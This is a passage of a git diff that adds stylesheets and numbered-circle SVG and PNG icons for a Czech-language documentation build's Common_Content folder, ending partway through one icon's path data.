+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+b, strong {
+	font-weight: bolder;
+}
+
+code.command {
+	font-family: monospace;
+	font-weight: bolder;
+}
diff --git a/tmp/cs-CZ/xml/Common_Content/css/lang.css b/tmp/cs-CZ/xml/Common_Content/css/lang.css
new file mode 100644
index 000000000..bbfe539ad
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/lang.css
@@ -0,0 +1,2 @@
+/* Empty file by default to avoid HTTP error 404 since that file
+ * is loaded from default.css */
diff --git a/tmp/cs-CZ/xml/Common_Content/css/overrides.css b/tmp/cs-CZ/xml/Common_Content/css/overrides.css
new file mode 100644
index 000000000..7315fbc7f
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/overrides.css
@@ -0,0 +1,179 @@
+a:link {
+	color:#0035C7;
+}
+
+a:visited {
+	color:#54638C;
+}
+
+h1 {
+	color:#C70036;
+}
+
+div.producttitle {
+	color:#C70036;
+}
+
+.section h1.title {
+	color:#C70036;
+}
+
+
+h2,h3,h4,h5,h6 {
+	color:#C70036;
+}
+
+.docnav.top li.home {
+        color: #C70036;
+}
+
+
+table {
+	border:1px solid #aaa;
+}
+
+table th {
+	background-color:#900;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+#title a {
+	height:54px;
+}
+
+.term{
+	color:#C70036;
+}
+
+.revhistory table th {
+	color:#C70036;
+}
+
+.titlepage .edition {
+	color: #C70036;
+}
+
+span.remark{
+	background-color: #ffff00;
+}
+
+/* Styles of block URLs */
+div.url {
+    margin-top: 0.5em;
+}
+div.url + div.url {
+    margin-top: 0;
+}
+
+/* Styles of sidebars */
+div.sidebar {
+    border: 2px solid #aaaaaa;
+    margin-top: 10px;
+    margin-bottom: 10px;
+    padding: 10px;
+    font-size: 90%;
+    background-color: #eeeeee;
+}
+
+div.sidebar > div.titlepage {
+    border-bottom: 1px solid;
+}
+
+div.sidebar > div.titlepage span.emphasis:nth-child(1) > em {
+    color: #666666;
+    font-style: normal;
+    font-variant: small-caps;
+}
+
+/* Modify behaviour within sidebars */
+div.sidebar p.title {
+    margin-bottom: 0;
+    margin-top: 0;
+}
+
+div.sidebar > p, div.sidebar > div.para {
+    margin-top: 1em;
+    margin-bottom: 0;
+}
+
+/* Styles of screens */
+.screen .computeroutput {
+    font-weight: normal;
+}
+
+/* CSS for the banner */
+#banner {
+    position: fixed;
+    top: 0;
+    right: 0;
+    z-index: 2;
+}
+#banner a {
+    display: block;
+    font-size: 13px;
+    font-family: "DejaVu Sans Condensed", "Liberation Sans", "Nimbus Sans L", Tahoma, Geneva, "Helvetica Neue", Helvetica, Arial, sans serif;
+    font-weight: bold;
+    text-decoration: none;
+    text-shadow: 0 0 0.5em #444;
+    border-bottom: none;
+
+    background-color: #9a0000;
+    color: #FFF;
+    text-align: center;
+    box-shadow: 0 0 13px #888;
+}
+#banner .text {
+    display: block;
+    padding: 3px 0;
+    border: 1px solid #bf6060;
+}
+#banner a:hover {
+    color: #ffff99;
+}
+
+@media (min-width: 1000px) {
+    #banner {
+	height: 149px;
+	width: 149px;
+	overflow: hidden;
+	padding: 0;
+	margin: 0;
+    }
+    #banner a {
+	width: 190px;
+	padding: 1px 15px 1px 25px;
+	position: relative;
+	left: 20px;
+	top: -37px;
+
+	-moz-transform-origin: 0 0 ;
+	-moz-transform: rotate(45deg);
+	-moz-box-shadow: 0 0 13px #888;
+
+	-webkit-transform-origin: 0 0 ;
+	-webkit-transform: rotate(45deg);
+	-webkit-box-shadow: 0 0 13px #888;
+
+	-ms-transform-origin: 0 0 ;
+	-ms-transform: rotate(45deg);
+	-ms-box-shadow: 0 0 13px #888;
+
+	transform-origin: 0 0 ;
+	transform: rotate(45deg);
+	box-shadow: 0 0 13px #888;
+    }
+}
+@media (max-width: 999px) {
+    #banner {
+	width: 100%;
+	position: fixed;
+	top: 0;
+	left: 0;
+    }
+    #title {
+	padding-top: 20px;
+    }
+}
diff --git a/tmp/cs-CZ/xml/Common_Content/css/print.css b/tmp/cs-CZ/xml/Common_Content/css/print.css
new file mode 100644
index 000000000..773d8ae1b
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/print.css
@@ -0,0 +1,16 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
+#tocframe {
+	display: none;
+}
+
+body.toc_embeded {
+	margin-left: 30px;
+}
+
+.producttitle {
+	color: #336699;
+}
+
diff --git a/tmp/cs-CZ/xml/Common_Content/images/1.png b/tmp/cs-CZ/xml/Common_Content/images/1.png
new file mode 100644
index 000000000..ef0beba85
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/1.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/1.svg b/tmp/cs-CZ/xml/Common_Content/images/1.svg
new file mode 100644
index 000000000..4c6bf5795
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/1.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#000000;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 17.853468,22.008438 -2.564941,0 0,-7.022461 c -5e-6,-0.143873 -5e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224122,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08854,0.08302 -0.17432,0.157723 -0.257324,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/10.png b/tmp/cs-CZ/xml/Common_Content/images/10.png
new file mode 100644
index 000000000..05f22391e
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/10.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/10.svg b/tmp/cs-CZ/xml/Common_Content/images/10.svg
new file mode 100644
index 000000000..0edda5b6f
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/10.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/11.png b/tmp/cs-CZ/xml/Common_Content/images/11.png
new file mode 100644
index 000000000..32b4a0483
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/11.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/11.svg b/tmp/cs-CZ/xml/Common_Content/images/11.svg
new file mode 100644
index 000000000..c95afcc14
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/11.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/12.png b/tmp/cs-CZ/xml/Common_Content/images/12.png
new file mode 100644
index 000000000..45fa4892a
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/12.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/12.svg b/tmp/cs-CZ/xml/Common_Content/images/12.svg
new file mode 100644
index 000000000..e3c3fd66c
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/12.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/13.png b/tmp/cs-CZ/xml/Common_Content/images/13.png
new file mode 100644
index 000000000..0b766d3f8
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/13.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/13.svg b/tmp/cs-CZ/xml/Common_Content/images/13.svg
new file mode 100644
index 000000000..35b496914
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/13.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/14.png b/tmp/cs-CZ/xml/Common_Content/images/14.png
new file mode 100644
index 000000000..2e1d73716
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/14.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/14.svg b/tmp/cs-CZ/xml/Common_Content/images/14.svg
new file mode 100644
index 000000000..832f81679
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/14.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/15.png b/tmp/cs-CZ/xml/Common_Content/images/15.png
new file mode 100644
index 000000000..7d21c66bb
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/15.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/15.svg b/tmp/cs-CZ/xml/Common_Content/images/15.svg
new file mode 100644
index 000000000..830d65439
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/15.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2839"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2841"
